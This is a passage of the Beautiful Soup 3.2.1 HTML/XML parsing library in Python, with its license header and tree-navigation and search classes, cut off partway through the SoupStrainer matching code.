    "content": "\"\"\"Beautiful Soup\nElixir and Tonic\n\"The Screen-Scraper's Friend\"\nhttp://www.crummy.com/software/BeautifulSoup/\n\nBeautiful Soup parses a (possibly invalid) XML or HTML document into a\ntree representation. It provides methods and Pythonic idioms that make\nit easy to navigate, search, and modify the tree.\n\nA well-formed XML/HTML document yields a well-formed data\nstructure. An ill-formed XML/HTML document yields a correspondingly\nill-formed data structure. If your document is only locally\nwell-formed, you can use this library to find and process the\nwell-formed part of it.\n\nBeautiful Soup works with Python 2.2 and up. It has no external\ndependencies, but you'll have more success at converting data to UTF-8\nif you also install these three packages:\n\n* chardet, for auto-detecting character encodings\n  http://chardet.feedparser.org/\n* cjkcodecs and iconv_codec, which add more encodings to the ones supported\n  by stock Python.\n  http://cjkpython.i18n.org/\n\nBeautiful Soup defines classes for two main parsing strategies:\n\n * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific\n   language that kind of looks like XML.\n\n * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid\n   or invalid. This class has web browser-like heuristics for\n   obtaining a sensible parse tree in the face of common HTML errors.\n\nBeautiful Soup also defines a class (UnicodeDammit) for autodetecting\nthe encoding of an HTML or XML document, and converting it to\nUnicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser.\n\nFor more than you ever wanted to know about Beautiful Soup, see the\ndocumentation:\nhttp://www.crummy.com/software/BeautifulSoup/documentation.html\n\nHere, have some legalese:\n\nCopyright (c) 2004-2010, Leonard Richardson\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are\nmet:\n\n  * Redistributions of source code must retain the above copyright\n    notice, this list of conditions and the following disclaimer.\n\n  * Redistributions in binary form must reproduce the above\n    copyright notice, this list of conditions and the following\n    disclaimer in the documentation and/or other materials provided\n    with the distribution.\n\n  * Neither the name of the the Beautiful Soup Consortium and All\n    Night Kosher Bakery nor the names of its contributors may be\n    used to endorse or promote products derived from this software\n    without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\nA PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\nCONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\nPROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\nNEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT.\n\n\"\"\"\nfrom __future__ import generators\nfrom __future__ import print_function\n\n__author__ = \"Leonard Richardson (leonardr@segfault.org)\"\n__version__ = \"3.2.1\"\n__copyright__ = \"Copyright (c) 2004-2012 Leonard Richardson\"\n__license__ = \"New-style BSD\"\n\nimport codecs\nimport re\nimport sys\n\nif sys.version_info >= (3, 0):\n    xrange = range\n    text_type = str\n    binary_type = bytes\n    basestring = str\nelse:\n    text_type = unicode\n    binary_type = str\n\ntry:\n  from htmlentitydefs import name2codepoint\nexcept ImportError:\n  name2codepoint = {}\ntry:\n    set\nexcept NameError:\n    from sets import Set as set\n\ntry:\n    import sgmllib\nexcept ImportError:\n    from lib.utils import sgmllib\n\ntry:\n    import markupbase\nexcept ImportError:\n    import _markupbase as markupbase\n\n#These hacks make Beautiful Soup able to parse XML with namespaces\nsgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*')\nmarkupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\\s*').match\n\nDEFAULT_OUTPUT_ENCODING = \"utf-8\"\n\ndef _match_css_class(str):\n    \"\"\"Build a RE to match the given CSS class.\"\"\"\n    return re.compile(r\"(^|.*\\s)%s($|\\s)\" % str)\n\n# First, the classes that represent markup elements.\n\nclass PageElement(object):\n    \"\"\"Contains the navigational information for some part of the page\n    (either a tag or a piece of text)\"\"\"\n\n    def _invert(h):\n        \"Cheap function to invert a hash.\"\n        i = {}\n        for k,v in h.items():\n            i[v] = k\n        return i\n\n    XML_ENTITIES_TO_SPECIAL_CHARS = { \"apos\" : \"'\",\n                                      \"quot\" : '\"',\n                                      \"amp\" : \"&\",\n                                      \"lt\" : \"<\",\n                                      \"gt\" : \">\" }\n\n    XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS)\n\n    def setup(self, parent=None, previous=None):\n        \"\"\"Sets up the initial relations between this element and\n        other elements.\"\"\"\n        self.parent = parent\n        self.previous = previous\n        self.next = None\n        self.previousSibling = None\n        self.nextSibling = None\n        if self.parent and self.parent.contents:\n            self.previousSibling = self.parent.contents[-1]\n            self.previousSibling.nextSibling = self\n\n    def replaceWith(self, replaceWith):\n        oldParent = self.parent\n        myIndex = self.parent.index(self)\n        if hasattr(replaceWith, \"parent\")\\\n                  and replaceWith.parent is self.parent:\n            # We're replacing this element with one of its siblings.\n            index = replaceWith.parent.index(replaceWith)\n            if index and index < myIndex:\n                # Furthermore, it comes before this element. That\n                # means that when we extract it, the index of this\n                # element will change.\n                myIndex = myIndex - 1\n        self.extract()\n        oldParent.insert(myIndex, replaceWith)\n\n    def replaceWithChildren(self):\n        myParent = self.parent\n        myIndex = self.parent.index(self)\n        self.extract()\n        reversedChildren = list(self.contents)\n        reversedChildren.reverse()\n        for child in reversedChildren:\n            myParent.insert(myIndex, child)\n\n    def extract(self):\n        \"\"\"Destructively rips this element out of the tree.\"\"\"\n        if self.parent:\n            try:\n                del self.parent.contents[self.parent.index(self)]\n            except ValueError:\n                pass\n\n        #Find the two elements that would be next to each other if\n        #this element (and any children) hadn't been parsed. Connect\n        #the two.\n        lastChild = self._lastRecursiveChild()\n        nextElement = lastChild.next\n\n        if self.previous:\n            self.previous.next = nextElement\n        if nextElement:\n            nextElement.previous = self.previous\n        self.previous = None\n        lastChild.next = None\n\n        self.parent = None\n        if self.previousSibling:\n            self.previousSibling.nextSibling = self.nextSibling\n        if self.nextSibling:\n            self.nextSibling.previousSibling = self.previousSibling\n        self.previousSibling = self.nextSibling = None\n        return self\n\n    def _lastRecursiveChild(self):\n        \"Finds the last element beneath this object to be parsed.\"\n        lastChild = self\n        while hasattr(lastChild, 'contents') and lastChild.contents:\n            lastChild = lastChild.contents[-1]\n        return lastChild\n\n    def insert(self, position, newChild):\n        if isinstance(newChild, basestring) \\\n            and not isinstance(newChild, NavigableString):\n            newChild = NavigableString(newChild)\n\n        position =  min(position, len(self.contents))\n        if hasattr(newChild, 'parent') and newChild.parent is not None:\n            # We're 'inserting' an element that's already one\n            # of this object's children.\n            if newChild.parent is self:\n                index = self.index(newChild)\n                if index > position:\n                    # Furthermore we're moving it further down the\n                    # list of this object's children. That means that\n                    # when we extract this element, our target index\n                    # will jump down one.\n                    position = position - 1\n            newChild.extract()\n\n        newChild.parent = self\n        previousChild = None\n        if position == 0:\n            newChild.previousSibling = None\n            newChild.previous = self\n        else:\n            previousChild = self.contents[position-1]\n            newChild.previousSibling = previousChild\n            newChild.previousSibling.nextSibling = newChild\n            newChild.previous = previousChild._lastRecursiveChild()\n        if newChild.previous:\n            newChild.previous.next = newChild\n\n        newChildsLastElement = newChild._lastRecursiveChild()\n\n        if position >= len(self.contents):\n            newChild.nextSibling = None\n\n            parent = self\n            parentsNextSibling = None\n            while not parentsNextSibling:\n                parentsNextSibling = parent.nextSibling\n                parent = parent.parent\n                if not parent: # This is the last element in the document.\n                    break\n            if parentsNextSibling:\n                newChildsLastElement.next = parentsNextSibling\n            else:\n                newChildsLastElement.next = None\n        else:\n            nextChild = self.contents[position]\n            newChild.nextSibling = nextChild\n            if newChild.nextSibling:\n                newChild.nextSibling.previousSibling = newChild\n            newChildsLastElement.next = nextChild\n\n        if newChildsLastElement.next:\n            newChildsLastElement.next.previous = newChildsLastElement\n        self.contents.insert(position, newChild)\n\n    def append(self, tag):\n        \"\"\"Appends the given tag to the contents of this tag.\"\"\"\n        self.insert(len(self.contents), tag)\n\n    def findNext(self, name=None, attrs={}, text=None, **kwargs):\n        \"\"\"Returns the first item that matches the given criteria and\n        appears after this Tag in the document.\"\"\"\n        return self._findOne(self.findAllNext, name, attrs, text, **kwargs)\n\n    def findAllNext(self, name=None, attrs={}, text=None, limit=None,\n                    **kwargs):\n        \"\"\"Returns all items that match the given criteria and appear\n        after this Tag in the document.\"\"\"\n        return self._findAll(name, attrs, text, limit, self.nextGenerator,\n                             **kwargs)\n\n    def findNextSibling(self, name=None, attrs={}, text=None, **kwargs):\n        \"\"\"Returns the closest sibling to this Tag that matches the\n        given criteria and appears after this Tag in the document.\"\"\"\n        return self._findOne(self.findNextSiblings, name, attrs, text,\n                             **kwargs)\n\n    def findNextSiblings(self, name=None, attrs={}, text=None, limit=None,\n                         **kwargs):\n        \"\"\"Returns the siblings of this Tag that match the given\n        criteria and appear after this Tag in the document.\"\"\"\n        return self._findAll(name, attrs, text, limit,\n                             self.nextSiblingGenerator, **kwargs)\n    fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x\n\n    def findPrevious(self, name=None, attrs={}, text=None, **kwargs):\n        \"\"\"Returns the first item that matches the given criteria and\n        appears before this Tag in the document.\"\"\"\n        return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs)\n\n    def findAllPrevious(self, name=None, attrs={}, text=None, limit=None,\n                        **kwargs):\n        \"\"\"Returns all items that match the given criteria and appear\n        before this Tag in the document.\"\"\"\n        return self._findAll(name, attrs, text, limit, self.previousGenerator,\n                           **kwargs)\n    fetchPrevious = findAllPrevious # Compatibility with pre-3.x\n\n    def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs):\n        \"\"\"Returns the closest sibling to this Tag that matches the\n        given criteria and appears before this Tag in the document.\"\"\"\n        return self._findOne(self.findPreviousSiblings, name, attrs, text,\n                             **kwargs)\n\n    def findPreviousSiblings(self, name=None, attrs={}, text=None,\n                             limit=None, **kwargs):\n        \"\"\"Returns the siblings of this Tag that match the given\n        criteria and appear before this Tag in the document.\"\"\"\n        return self._findAll(name, attrs, text, limit,\n                             self.previousSiblingGenerator, **kwargs)\n    fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x\n\n    def findParent(self, name=None, attrs={}, **kwargs):\n        \"\"\"Returns the closest parent of this Tag that matches the given\n        criteria.\"\"\"\n        # NOTE: We can't use _findOne because findParents takes a different\n        # set of arguments.\n        r = None\n        l = self.findParents(name, attrs, 1)\n        if l:\n            r = l[0]\n        return r\n\n    def findParents(self, name=None, attrs={}, limit=None, **kwargs):\n        \"\"\"Returns the parents of this Tag that match the given\n        criteria.\"\"\"\n\n        return self._findAll(name, attrs, None, limit, self.parentGenerator,\n                             **kwargs)\n    fetchParents = findParents # Compatibility with pre-3.x\n\n    #These methods do the real heavy lifting.\n\n    def _findOne(self, method, name, attrs, text, **kwargs):\n        r = None\n        l = method(name, attrs, text, 1, **kwargs)\n        if l:\n            r = l[0]\n        return r\n\n    def _findAll(self, name, attrs, text, limit, generator, **kwargs):\n        \"Iterates over a generator looking for things that match.\"\n\n        if isinstance(name, SoupStrainer):\n            strainer = name\n        # (Possibly) special case some findAll*(...) searches\n        elif text is None and not limit and not attrs and not kwargs:\n            # findAll*(True)\n            if name is True:\n                return [element for element in generator()\n                        if isinstance(element, Tag)]\n            # findAll*('tag-name')\n            elif isinstance(name, basestring):\n                return [element for element in generator()\n                        if isinstance(element, Tag) and\n                        element.name == name]\n            else:\n                strainer = SoupStrainer(name, attrs, text, **kwargs)\n        # Build a SoupStrainer\n        else:\n            strainer = SoupStrainer(name, attrs, text, **kwargs)\n        results = ResultSet(strainer)\n        g = generator()\n        while True:\n            try:\n                i = next(g)\n            except StopIteration:\n                break\n            if i:\n                found = strainer.search(i)\n                if found:\n                    results.append(found)\n                    if limit and len(results) >= limit:\n                        break\n        return results\n\n    #These Generators can be used to navigate starting from both\n    #NavigableStrings and Tags.\n    def nextGenerator(self):\n        i = self\n        while i is not None:\n            i = i.next\n            yield i\n\n    def nextSiblingGenerator(self):\n        i = self\n        while i is not None:\n            i = i.nextSibling\n            yield i\n\n    def previousGenerator(self):\n        i = self\n        while i is not None:\n            i = i.previous\n            yield i\n\n    def previousSiblingGenerator(self):\n        i = self\n        while i is not None:\n            i = i.previousSibling\n            yield i\n\n    def parentGenerator(self):\n        i = self\n        while i is not None:\n            i = i.parent\n            yield i\n\n    # Utility methods\n    def substituteEncoding(self, str, encoding=None):\n        encoding = encoding or \"utf-8\"\n        return str.replace(\"%SOUP-ENCODING%\", encoding)\n\n    def toEncoding(self, s, encoding=None):\n        \"\"\"Encodes an object to a string in some encoding, or to Unicode.\n        .\"\"\"\n        if isinstance(s, text_type):\n            if encoding:\n                s = s.encode(encoding)\n        elif isinstance(s, binary_type):\n            s = s.encode(encoding or \"utf8\")\n        else:\n            s  = self.toEncoding(str(s), encoding or \"utf8\")\n        return s\n\n    BARE_AMPERSAND_OR_BRACKET = re.compile(r\"([<>]|&(?!#\\d+;|#x[0-9a-fA-F]+;|\\w+;))\")\n\n    def _sub_entity(self, x):\n        \"\"\"Used with a regular expression to substitute the\n        appropriate XML entity for an XML special character.\"\"\"\n        return \"&\" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + \";\"\n\n\nclass NavigableString(text_type, PageElement):\n\n    def __new__(cls, value):\n        \"\"\"Create a new NavigableString.\n\n        When unpickling a NavigableString, this method is called with\n        the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be\n        passed in to the superclass's __new__ or the superclass won't know\n        how to handle non-ASCII characters.\n        \"\"\"\n        if isinstance(value, text_type):\n            return text_type.__new__(cls, value)\n        return text_type.__new__(cls, value, DEFAULT_OUTPUT_ENCODING)\n\n    def __getnewargs__(self):\n        return (NavigableString.__str__(self),)\n\n    def __getattr__(self, attr):\n        \"\"\"text.string gives you text. This is for backwards\n        compatibility for Navigable*String, but for CData* it lets you\n        get the string without the CData wrapper.\"\"\"\n        if attr == 'string':\n            return self\n        else:\n            raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__.__name__, attr))\n\n    def __unicode__(self):\n        return str(self).decode(DEFAULT_OUTPUT_ENCODING)\n\n    def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):\n        # Substitute outgoing XML entities.\n        data = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, self)\n        if encoding:\n            return data.encode(encoding)\n        else:\n            return data\n\nclass CData(NavigableString):\n\n    def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):\n        return \"<![CDATA[%s]]>\" % NavigableString.__str__(self, encoding)\n\nclass ProcessingInstruction(NavigableString):\n    def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):\n        output = self\n        if \"%SOUP-ENCODING%\" in output:\n            output = self.substituteEncoding(output, encoding)\n        return \"<?%s?>\" % self.toEncoding(output, encoding)\n\nclass Comment(NavigableString):\n    def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):\n        return \"<!--%s-->\" % NavigableString.__str__(self, encoding)\n\nclass Declaration(NavigableString):\n    def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):\n        return \"<!%s>\" % NavigableString.__str__(self, encoding)\n\nclass Tag(PageElement):\n\n    \"\"\"Represents a found HTML tag with its attributes and contents.\"\"\"\n\n    def _convertEntities(self, match):\n        \"\"\"Used in a call to re.sub to replace HTML, XML, and numeric\n        entities with the appropriate Unicode characters. If HTML\n        entities are being converted, any unrecognized entities are\n        escaped.\"\"\"\n        try:\n            x = match.group(1)\n            if self.convertHTMLEntities and x in name2codepoint:\n                return unichr(name2codepoint[x])\n            elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS:\n                if self.convertXMLEntities:\n                    return self.XML_ENTITIES_TO_SPECIAL_CHARS[x]\n                else:\n                    return u'&%s;' % x\n            elif len(x) > 0 and x[0] == '#':\n                # Handle numeric entities\n                if len(x) > 1 and x[1] == 'x':\n                    return unichr(int(x[2:], 16))\n                else:\n                    return unichr(int(x[1:]))\n\n            elif self.escapeUnrecognizedEntities:\n                return u'&amp;%s;' % x\n\n        except ValueError:  # e.g. ValueError: unichr() arg not in range(0x10000)\n            pass\n\n        return u'&%s;' % x\n\n    def __init__(self, parser, name, attrs=None, parent=None,\n                 previous=None):\n        \"Basic constructor.\"\n\n        # We don't actually store the parser object: that lets extracted\n        # chunks be garbage-collected\n        self.parserClass = parser.__class__\n        self.isSelfClosing = parser.isSelfClosingTag(name)\n        self.name = name\n        if attrs is None:\n            attrs = []\n        elif isinstance(attrs, dict):\n            attrs = attrs.items()\n        self.attrs = attrs\n        self.contents = []\n        self.setup(parent, previous)\n        self.hidden = False\n        self.containsSubstitutions = False\n        self.convertHTMLEntities = parser.convertHTMLEntities\n        self.convertXMLEntities = parser.convertXMLEntities\n        self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities\n\n        # Convert any HTML, XML, or numeric entities in the attribute values.\n        # Reference: https://github.com/pkrumins/xgoogle/pull/16/commits/3dba1165c436b0d6e5bdbd09e53ca0dbf8a043f8\n        convert = lambda k_val: (k_val[0],\n                                 re.sub(r\"&(#\\d+|#x[0-9a-fA-F]+|\\w+);\",\n                                     self._convertEntities,\n                                     k_val[1]))\n        self.attrs = map(convert, self.attrs)\n\n    def getString(self):\n        if (len(self.contents) == 1\n            and isinstance(self.contents[0], NavigableString)):\n            return self.contents[0]\n\n    def setString(self, string):\n        \"\"\"Replace the contents of the tag with a string\"\"\"\n        self.clear()\n        self.append(string)\n\n    string = property(getString, setString)\n\n    def getText(self, separator=u\"\"):\n        if not len(self.contents):\n            return u\"\"\n        stopNode = self._lastRecursiveChild().next\n        strings = []\n        current = self.contents[0]\n        while current and current is not stopNode:\n            if isinstance(current, NavigableString):\n                strings.append(current.strip())\n            current = current.next\n        return separator.join(strings)\n\n    text = property(getText)\n\n    def get(self, key, default=None):\n        \"\"\"Returns the value of the 'key' attribute for the tag, or\n        the value given for 'default' if it doesn't have that\n        attribute.\"\"\"\n        return self._getAttrMap().get(key, default)\n\n    def clear(self):\n        \"\"\"Extract all children.\"\"\"\n        for child in self.contents[:]:\n            child.extract()\n\n    def index(self, element):\n        for i, child in enumerate(self.contents):\n            if child is element:\n                return i\n        raise ValueError(\"Tag.index: element not in tag\")\n\n    def has_key(self, key):\n        return self._getAttrMap().has_key(key)\n\n    def __getitem__(self, key):\n        \"\"\"tag[key] returns the value of the 'key' attribute for the tag,\n        and throws an exception if it's not there.\"\"\"\n        return self._getAttrMap()[key]\n\n    def __iter__(self):\n        \"Iterating over a tag iterates over its contents.\"\n        return iter(self.contents)\n\n    def __len__(self):\n        \"The length of a tag is the length of its list of contents.\"\n        return len(self.contents)\n\n    def __contains__(self, x):\n        return x in self.contents\n\n    def __nonzero__(self):\n        \"A tag is non-None even if it has no contents.\"\n        return True\n\n    def __setitem__(self, key, value):\n        \"\"\"Setting tag[key] sets the value of the 'key' attribute for the\n        tag.\"\"\"\n        self._getAttrMap()\n        self.attrMap[key] = value\n        found = False\n        for i in xrange(0, len(self.attrs)):\n            if self.attrs[i][0] == key:\n                self.attrs[i] = (key, value)\n                found = True\n        if not found:\n            self.attrs.append((key, value))\n        self._getAttrMap()[key] = value\n\n    def __delitem__(self, key):\n        \"Deleting tag[key] deletes all 'key' attributes for the tag.\"\n        for item in self.attrs:\n            if item[0] == key:\n                self.attrs.remove(item)\n                #We don't break because bad HTML can define the same\n                #attribute multiple times.\n            self._getAttrMap()\n            if self.attrMap.has_key(key):\n                del self.attrMap[key]\n\n    def __call__(self, *args, **kwargs):\n        \"\"\"Calling a tag like a function is the same as calling its\n        findAll() method. Eg. tag('a') returns a list of all the A tags\n        found within this tag.\"\"\"\n        return self.findAll(*args, **kwargs)\n\n    def __getattr__(self, tag):\n        #print \"Getattr %s.%s\" % (self.__class__, tag)\n        if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:\n            return self.find(tag[:-3])\n        elif tag.find('__') != 0:\n            return self.find(tag)\n        raise AttributeError(\"'%s' object has no attribute '%s'\" % (self.__class__, tag))\n\n    def __eq__(self, other):\n        \"\"\"Returns true iff this tag has the same name, the same attributes,\n        and the same contents (recursively) as the given tag.\n\n        NOTE: right now this will return false if two tags have the\n        same attributes in a different order. Should this be fixed?\"\"\"\n        if other is self:\n            return True\n        if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):\n            return False\n        for i in xrange(0, len(self.contents)):\n            if self.contents[i] != other.contents[i]:\n                return False\n        return True\n\n    def __ne__(self, other):\n        \"\"\"Returns true iff this tag is not identical to the other tag,\n        as defined in __eq__.\"\"\"\n        return not self == other\n\n    def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):\n        \"\"\"Renders this tag as a string.\"\"\"\n        return self.__str__(encoding)\n\n    def __unicode__(self):\n        return self.__str__(None)\n\n    def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING,\n                prettyPrint=False, indentLevel=0):\n        \"\"\"Returns a string or Unicode representation of this tag and\n        its contents. To get Unicode, pass None for encoding.\n\n        NOTE: since Python's HTML parser consumes whitespace, this\n        method is not certain to reproduce the whitespace present in\n        the original string.\"\"\"\n\n        encodedName = self.toEncoding(self.name, encoding)\n\n        attrs = []\n        if self.attrs:\n            for key, val in self.attrs:\n                fmt = '%s=\"%s\"'\n                if isinstance(val, basestring):\n                    if self.containsSubstitutions and '%SOUP-ENCODING%' in val:\n                        val = self.substituteEncoding(val, encoding)\n\n                    # The attribute value either:\n                    #\n                    # * Contains no embedded double quotes or single quotes.\n                    #   No problem: we enclose it in double quotes.\n                    # * Contains embedded single quotes. No problem:\n                    #   double quotes work here too.\n                    # * Contains embedded double quotes. No problem:\n                    #   we enclose it in single quotes.\n                    # * Embeds both single _and_ double quotes. This\n                    #   can't happen naturally, but it can happen if\n                    #   you modify an attribute value after parsing\n                    #   the document. Now we have a bit of a\n                    #   problem. We solve it by enclosing the\n                    #   attribute in single quotes, and escaping any\n                    #   embedded single quotes to XML entities.\n                    if '\"' in val:\n                        fmt = \"%s='%s'\"\n                        if \"'\" in val:\n                            # TODO: replace with apos when\n                            # appropriate.\n                            val = val.replace(\"'\", \"&squot;\")\n\n                    # Now we're okay w/r/t quotes. But the attribute\n                    # value might also contain angle brackets, or\n                    # ampersands that aren't part of entities. We need\n                    # to escape those to XML entities too.\n                    val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val)\n\n                attrs.append(fmt % (self.toEncoding(key, encoding),\n                                    self.toEncoding(val, encoding)))\n        close = ''\n        closeTag = ''\n        if self.isSelfClosing:\n            close = ' /'\n        else:\n            closeTag = '</%s>' % encodedName\n\n        indentTag, indentContents = 0, 0\n        if prettyPrint:\n            indentTag = indentLevel\n            space = (' ' * (indentTag-1))\n            indentContents = indentTag + 1\n        contents = self.renderContents(encoding, prettyPrint, indentContents)\n        if self.hidden:\n            s = contents\n        else:\n            s = []\n            attributeString = ''\n            if attrs:\n                attributeString = ' ' + ' '.join(attrs)\n            if prettyPrint:\n                s.append(space)\n            s.append('<%s%s%s>' % (encodedName, attributeString, close))\n            if prettyPrint:\n                s.append(\"\\n\")\n            s.append(contents)\n            if prettyPrint and contents and contents[-1] != \"\\n\":\n                s.append(\"\\n\")\n            if prettyPrint and closeTag:\n                s.append(space)\n            s.append(closeTag)\n            if prettyPrint and closeTag and self.nextSibling:\n                s.append(\"\\n\")\n            s = ''.join(s)\n        return s\n\n    def decompose(self):\n        \"\"\"Recursively destroys the contents of this tree.\"\"\"\n        self.extract()\n        if len(self.contents) == 0:\n            return\n        current = self.contents[0]\n        while current is not None:\n            next = current.next\n            if isinstance(current, Tag):\n                del current.contents[:]\n            current.parent = None\n            current.previous = None\n            current.previousSibling = None\n            current.next = None\n            current.nextSibling = None\n            current = next\n\n    def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):\n        return self.__str__(encoding, True)\n\n    def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING,\n                       prettyPrint=False, indentLevel=0):\n        \"\"\"Renders the contents of this tag as a string in the given\n        encoding. If encoding is None, returns a Unicode string..\"\"\"\n        s=[]\n        for c in self:\n            text = None\n            if isinstance(c, NavigableString):\n                text = c.__str__(encoding)\n            elif isinstance(c, Tag):\n                s.append(c.__str__(encoding, prettyPrint, indentLevel))\n            if text and prettyPrint:\n                text = text.strip()\n            if text:\n                if prettyPrint:\n                    s.append(\" \" * (indentLevel-1))\n                s.append(text)\n                if prettyPrint:\n                    s.append(\"\\n\")\n\n        return ''.join(s)\n\n    #Soup methods\n\n    def find(self, name=None, attrs={}, recursive=True, text=None,\n             **kwargs):\n        \"\"\"Return only the first child of this Tag matching the given\n        criteria.\"\"\"\n        r = None\n        l = self.findAll(name, attrs, recursive, text, 1, **kwargs)\n        if l:\n            r = l[0]\n        return r\n    findChild = find\n\n    def findAll(self, name=None, attrs={}, recursive=True, text=None,\n                limit=None, **kwargs):\n        \"\"\"Extracts a list of Tag objects that match the given\n        criteria.  You can specify the name of the Tag and any\n        attributes you want the Tag to have.\n\n        The value of a key-value pair in the 'attrs' map can be a\n        string, a list of strings, a regular expression object, or a\n        callable that takes a string and returns whether or not the\n        string matches for some custom definition of 'matches'. The\n        same is true of the tag name.\"\"\"\n        generator = self.recursiveChildGenerator\n        if not recursive:\n            generator = self.childGenerator\n        return self._findAll(name, attrs, text, limit, generator, **kwargs)\n    findChildren = findAll\n\n    # Pre-3.x compatibility methods\n    first = find\n    fetch = findAll\n\n    def fetchText(self, text=None, recursive=True, limit=None):\n        return self.findAll(text=text, recursive=recursive, limit=limit)\n\n    def firstText(self, text=None, recursive=True):\n        return self.find(text=text, recursive=recursive)\n\n    #Private methods\n\n    def _getAttrMap(self):\n        \"\"\"Initializes a map representation of this tag's attributes,\n        if not already initialized.\"\"\"\n        if not getattr(self, 'attrMap'):\n            self.attrMap = {}\n            for (key, value) in self.attrs:\n                self.attrMap[key] = value\n        return self.attrMap\n\n    #Generator methods\n    def childGenerator(self):\n        # Just use the iterator from the contents\n        return iter(self.contents)\n\n    def recursiveChildGenerator(self):\n        if not len(self.contents):\n            return  # Note: https://stackoverflow.com/a/30217723 (PEP 479)\n        stopNode = self._lastRecursiveChild().next\n        current = self.contents[0]\n        while current and current is not stopNode:\n            yield current\n            current = current.next\n\n\n# Next, a couple classes to represent queries and their results.\nclass SoupStrainer:\n    \"\"\"Encapsulates a number of ways of matching a markup element (tag or\n    text).\"\"\"\n\n    def __init__(self, name=None, attrs={}, text=None, **kwargs):\n        self.name = name\n        if isinstance(attrs, basestring):\n            kwargs['class'] = _match_css_class(attrs)\n            attrs = None\n        if kwargs:\n            if attrs:\n                attrs = attrs.copy()\n                attrs.update(kwargs)\n            else:\n                attrs = kwargs\n        self.attrs = attrs\n        self.text = text\n\n    def __str__(self):\n        if self.text:\n            return self.text\n        else:\n            return \"%s|%s\" % (self.name, self.attrs)\n\n    def searchTag(self, markupName=None, markupAttrs={}):\n        found = None\n        markup = None\n        if isinstance(markupName, Tag):\n            markup = markupName\n            markupAttrs = markup\n        callFunctionWithTagData = callable(self.name) \\\n                                and not isinstance(markupName, Tag)\n\n        if (not self.name) \\\n               or callFunctionWithTagData \\\n               or (markup and self._matches(markup, self.name)) \\\n               or (not markup and self._matches(markupName, self.name)):\n            if callFunctionWithTagData:\n                match = self.name(markupName, markupAttrs)\n            else:\n                match = True\n                markupAttrMap = None\n                for attr, matchAgainst in self.attrs.items():\n                    if not markupAttrMap:\n                         if hasattr(markupAttrs, 'get'):\n                            markupAttrMap = markupAttrs\n                         else:\n                            markupAttrMap = {}\n                            for k,v in markupAttrs:\n                                markupAttrMap[k] = v\n                    attrValue = markupAttrMap.get(attr)\n                    if not self._matches(attrValue, matchAgainst):\n                        match = False\n                        break\n            if match:\n                if markup:\n                    found = markup\n                else:\n                    found = markupName\n        return found\n\n    def search(self, markup):\n        #print 'looking for %s in %s' % (self, markup)\n        found = None\n        # If given a list of items, scan it for a text element that\n        # matches.\n        if hasattr(markup, \"__iter__\") \\\n                and not isinstance(markup, Tag):\n            for element in markup:\n                if isinstance(element, NavigableString) \\\n                       and self.search(element):\n                    found = element\n                    break\n        # If it's a Tag, make sure its name or attributes match.\n        # Don't bother with Tags if we're searching for text.\n        elif isinstance(markup, Tag):\n            if not self.text:\n                found = self.searchTag(markup)\n        # If it's text, make sure the text matches.\n        elif isinstance(markup, NavigableString) or \\\n                 isinstance(markup, basestring):\n            if self._matches(markup, self.text):\n                found = markup\n        else:\n            raise Exception(\"I don't know how to match against a %s\" \\\n                  % markup.__class__)\n        return found\n\n    def _matches(self, markup, matchAgainst):\n        #print \"Matching %s against %s\" % (markup, matchAgainst)\n        result = False\n        if matchAgainst is True:\n            result = markup is not None\n        elif callable(matchAgainst):\n            result = matchAgainst(markup)\n        else:\n            #Custom match methods take the tag as an argument, but all\n            #other ways of matching match the tag name as a string.\n            if isinstance(markup, Tag):\n                markup = markup.name\n            if markup and not isinstance(markup, basestring):\n                markup = text_type(markup)\n            #Now we know that chunk is either a string, or None.\n            if hasattr(matchAgainst, 'match'):\n                # It's a regexp object.\n                result = markup and 